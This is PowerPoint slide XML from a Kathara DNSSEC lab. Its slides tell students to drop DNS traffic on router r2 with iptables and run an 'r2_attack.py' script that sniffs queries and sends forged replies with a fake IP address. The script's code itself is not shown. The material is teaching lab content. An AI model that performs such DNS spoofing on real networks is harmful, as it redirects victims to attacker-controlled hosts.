            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B916521D-2F00-F47C-4AA3-1AA8D1D746FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841211DD-D84A-2766-2E7B-E75437A7235F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B514CD50-97B5-7687-571D-60EEB5A3E4AE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499E10C7-48E3-F95F-C83D-6E9B69ECBAC0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364364531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A4C08A-8D84-70F4-D183-525C5A22FA3E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E477792-AE3E-C5AB-E484-A256948A5B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run Python script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14BCBD05-044F-3368-4F3B-401D15344ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run the r2_attack script to sniff the traffic and then send the packet with the fake IP address to the client who made the query.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92662677-EAE1-8A17-37E6-891BE14F3CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4506762A-7896-DD2A-9A69-D6DDB3164940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89FDFA2D-DDDA-B915-AD91-2BA5B1467D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1832189" y="3464424"/>
            <a:ext cx="8527621" cy="2683937"/>
            <a:chOff x="4868024" y="2378845"/>
            <a:chExt cx="6736490" cy="2064838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D76ECF2-BF4D-D748-B04B-D8F8B6084DB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868025" y="2659116"/>
              <a:ext cx="6736489" cy="1784567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iptables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>python3 r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A53139F-56AB-D933-E1E1-F2A577DD00AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868024" y="2378845"/>
              <a:ext cx="6712254" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17246CA-7F7F-1D8F-B181-BD547AA64CA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C9CDD9-8EB6-44BA-5B0C-D99D4C26EBFB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE1B7C4F-E4D9-6B58-B5C7-AEAF12530CB3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768C1A4E-D9D4-7B7C-15DE-73397ADBA24D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82815988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DB1D9B-8FF2-F122-A46E-3A1B71BB73EC}"/>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19CF4F92-857D-FCBD-33A2-0ABE0551BAA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Icona del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD9306A5-DBB4-0AF6-EB42-E2BCD862BB6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36914" y="1082911"/>
            <a:ext cx="9571511" cy="5436658"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E05C305-665E-4F19-E1D8-C8542A146599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0859B313-58C7-ABD2-7A93-4A8BC2789D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7937BF-A883-274C-2322-8EA7C9FB4BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5838858" y="1868398"/>
            <a:ext cx="2782277" cy="1421068"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104244"/>
              <a:gd name="adj2" fmla="val -63765"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>type "www.uniroma3.it" as the URL in the search bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341002645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8912FE-E8FD-8E8D-EB65-19DDE4CE755E}"/>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5B07756B-A9A6-EE9C-C93C-26D7CD7D01F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
